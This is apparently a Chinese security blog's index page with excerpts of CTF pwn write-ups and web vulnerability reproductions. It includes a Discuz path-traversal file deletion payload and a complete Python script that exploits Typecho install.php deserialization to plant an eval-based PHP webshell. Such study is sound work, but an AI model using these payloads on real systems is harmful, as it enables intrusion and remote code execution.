发表于
字数统计: 1,212

写在前面

本萌新又开始玩pwn了,这次试一试pwnhub,竟然做出来了,希望有朝一日成为大佬。

题目描述

首先,题目是x64,开的保护如下:

1
2
3
4
5
Arch:     amd64-64-little
RELRO:    Full RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      No PIE (0x400000)

功能:

1
2
3
4
1.set name
2.set motto
3.show motto
4.Exit

且每个功能只能调用一次,除非修改bss段上的一个用作判断的值。

阅读全文 »

发表于
字数统计: 3,247

分析set

在set.c中,包含了自定义的set.h文件。

set.h

set.h中定义了一个结构体,组成单链,并声明了一些函数。这里需要注意的是,程序包含了stdarg.h,使得函数可以使用可变参数。

阅读全文 »

发表于
字数统计: 1,883

写在前面

在pwn的泥潭里越陷越深,无法自拔。本次的bctf中,遇到了一个题目,算是我这个萌新的知识盲点,于是,总结一下,纪念一下自己菜菜的小进步

题目

bctf2017的baby_arena,64位,也是比较简单的一道题吧

阅读全文 »

发表于
字数统计: 1,378

写在前面

由于我有了新欢忘了旧爱,在自己web还处于菜鸡的情况下,去学了pwn。在自己菜菜的技术前提下,大胆尝试了下0ctf的一道pwn,写此文,纪念自己菜菜的pwn体验

题目

题目是2018 0ctf的babyheap,64位,不是一道难题,但是也让我这个菜pwn写了很久。

阅读全文 »

发表于
字数统计: 355

漏洞复现

网上内容
首先在目录里建立111.txt
然后,获取formhash:7b2bf0ce

于是可以构建payload:

1
2
http://127.0.0.1/home.php?mod=spacecp&ac=profile&op=base
[post] birthprovince=../../../111.txt&profilesubmit=1&formhash=9945c60c

然后上传文件,就可以删除这个111.txt了

阅读全文 »

发表于
字数统计: 1,128

分析

补丁原理

当补丁打完之后,我们传入文件的时候,程序做了这样的处理

1
2
3
4
protected File file(String name, boolean mustExist) {
    File file = new File(base, name);
    return validate(file, mustExist, absoluteBase);
}

调用了validate函数

阅读全文 »

发表于
字数统计: 967

payload

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
#coding=UTF-8

import requests
import optparse


def exp(request_url):
    url = request_url+"/install.php?finish=1"
    headers = {'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Accept-Encoding': 'gzip, deflate, compress',
            'Accept-Language': 'en-us;q=0.5,en;q=0.3',
            'Cache-Control': 'max-age=0',
            'Referer':request_url+'/install.php',
            'Connection': 'close',
            'Cookie': '__typecho_config=YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mjp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo4OiJBVE9NIDEuMCI7czoyMDoiAFR5cGVjaG9fRmVlZABfaXRlbXMiO2E6MTp7aTowO2E6MTp7czo2OiJhdXRob3IiO086MTU6IlR5cGVjaG9fUmVxdWVzdCI6Mjp7czoyNDoiAFR5cGVjaG9fUmVxdWVzdABfcGFyYW1zIjthOjE6e3M6MTA6InNjcmVlbk5hbWUiO3M6NjA6ImZpbGVfcHV0X2NvbnRlbnRzKCdrZXkucGhwJywgJzw/cGhwIEBldmFsKCRfUE9TVFtwYXNzXSk7Pz4nKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fX19czo2OiJwcmVmaXgiO3M6NzoidHlwZWNobyI7fQ==',
            #'Cookie': '__typecho_config=YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mjp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo4OiJBVE9NIDEuMCI7czoyMDoiAFR5cGVjaG9fRmVlZABfaXRlbXMiO2E6MTp7aTowO2E6MTp7czo2OiJhdXRob3IiO086MTU6IlR5cGVjaG9fUmVxdWVzdCI6Mjp7czoyNDoiAFR5cGVjaG9fUmVxdWVzdABfcGFyYW1zIjthOjE6e3M6MTA6InNjcmVlbk5hbWUiO3M6NTc6ImZpbGVfcHV0X2NvbnRlbnRzKCdwMC5waHAnLCAnPD9waHAgQGV2YWwoJF9QT1NUW3AwXSk7Pz4nKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo0OiJldmFsIjt9fX19fXM6NjoicHJlZml4IjtzOjc6InR5cGVjaG8iO30=',
            'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0'}
    s = requests.Session()
    s.headers.update(headers)
    z = s.get(url=url)
    print z.content

parser = optparse.OptionParser("usage%prog" + "-u <target url>")
parser.add_option('-u', dest = 'tgturl', type = 'string', help = "please scand url.")
(options,args) = parser.parse_args()
tgturl = options.tgturl
exp(tgturl)

原理

这是一个PHP序列化的漏洞

阅读全文 »

发表于
字数统计: 975

这个题的解法是王一航大佬给我的启发,可以膜一膜大佬的简书,真的很6
附链接:http://www.jianshu.com/u/bf30f18c872c

题目背景

这个题目可以通过php的伪协议直接读取到源码,难点就是源码里的正则过滤。本题将初acgt以外的所有字符全部去掉了。于是,我们无法上传正常的木马

阅读全文 »

发表于
字数统计: 555

在whctf里膜到了这一题,致敬r神
首先要下载xdebug插件
然后,我们需要phpize来安装PHP的插件

apt install php7.0-dev

之后就是我们进入文件夹

阅读全文 »
undefined